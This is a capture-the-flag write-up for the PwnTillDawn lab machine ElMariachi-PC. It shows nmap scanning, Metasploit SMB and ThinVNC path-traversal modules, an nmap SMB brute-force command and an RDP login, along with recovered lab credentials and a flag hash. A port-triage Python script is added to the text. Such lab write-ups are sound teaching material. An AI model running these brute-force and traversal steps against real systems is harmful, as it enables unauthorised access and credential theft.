ptd-elmariachi-pc-private

As always, I start with an nmap scan:

┌─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #nmap -Pn -p1-65535 10.150.150.69 -oN 69.nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 11:42 BST
Stats: 0:00:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 69.38% done; ETC: 11:43 (0:00:18 remaining)
Nmap scan report for 10.150.150.69
Host is up (0.032s latency).
Not shown: 65521 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5040/tcp open unknown
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
50417/tcp open unknown
60000/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 57.50 seconds
┌─[root@parrot-virtual]─[/home/user/ptd]
└──╼ #
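An added example, not part of the original write-up, that parses the port table above for an exposure review. Without `-sV` the SERVICE column is only a lookup of the port number, so the ports reported as `unknown` (60000 among them) are the ones to identify and then justify or close. The `SENSITIVE` set and the function names are assumptions of this example.

```python
import re

# Port table copied from the scan above (nmap -oN "normal" output).
SCAN = """\
Not shown: 65521 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5040/tcp open unknown
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
50417/tcp open unknown
60000/tcp open unknown
"""

# Assumption for this example: service names the reviewer treats as
# remote-access or file-sharing exposure that should be filtered.
SENSITIVE = {"msrpc", "netbios-ssn", "microsoft-ds", "ms-wbt-server"}
# One table row: "<port>/<proto> <state> <service>".
ROW = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)$")

def parse_ports(text):
    """Return (port, proto, service) for each open port; skip other lines."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m and m.group(3) == "open":
            rows.append((int(m.group(1)), m.group(2), m.group(4)))
    return rows

def triage(rows):
    """Split open ports into sensitive, unidentified and other services."""
    out = {"sensitive": [], "unidentified": [], "other": []}
    for port, _proto, service in rows:
        key = ("sensitive" if service in SENSITIVE
               else "unidentified" if service == "unknown" else "other")
        out[key].append(port)
    return out

if __name__ == "__main__":
    for bucket, ports in triage(parse_ports(SCAN)).items():
        print(f"{bucket}: {ports}")
```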

$xfreerdp /u:puck /p:Geheim2020 /v:10.150.150.69

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.150.150.69
rhosts => 10.150.150.69
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[-] 10.150.150.69:445 - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.150.150.69:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >

Password Brute-forcing using Nmap


ubuntu@ubuntu:~$ nmap --script smb-brute -p445 10.150.150.69 --script-args userdb=users.txt,passdb=passwords.txt

Install Nmap-Vulners
To install the nmap-vulners script, we’ll first use cd to change into the Nmap scripts directory.

cd /usr/share/nmap/scripts/
Then clone the nmap-vulners GitHub repository with the command below. That’s all there is to installing nmap-vulners; no configuration is required afterwards.

git clone https://github.com/vulnersCom/nmap-vulners.git

Cloning into 'nmap-vulners'...
remote: Counting objects: 28, done.
remote: Compressing objects: 100% (23/23), done.
remote: Total 28 (delta 9), reused 19 (delta 4), pack-reused 0
Unpacking objects: 100% (28/28), done.

The service on port 60000, http://10.150.150.69:60000/, is ThinVNC:
msf6 auxiliary(scanner/http/thinvnc_traversal) > set rhosts 10.150.150.69
rhosts => 10.150.150.69
msf6 auxiliary(scanner/http/thinvnc_traversal) > set rport 60000
rport => 60000
msf6 auxiliary(scanner/http/thinvnc_traversal) > run

[+] File ThinVnc.ini saved in: /root/.msf4/loot/20200826122605_default_10.150.150.69_thinvnc.traversa_219192.txt
[+] Found credentials: desperado:TooComplicatedToGuessMeAhahahahahahahh
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/thinvnc_traversal) >

flag67 = 2971f3459fe55db1237aad5e0f0a259a41633962

However, if you see the following in the “Write-Up” box, you can publish online the explanations of how you compromised that box, but we ask you in return to give us credit for the machines by adding backlinks to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.
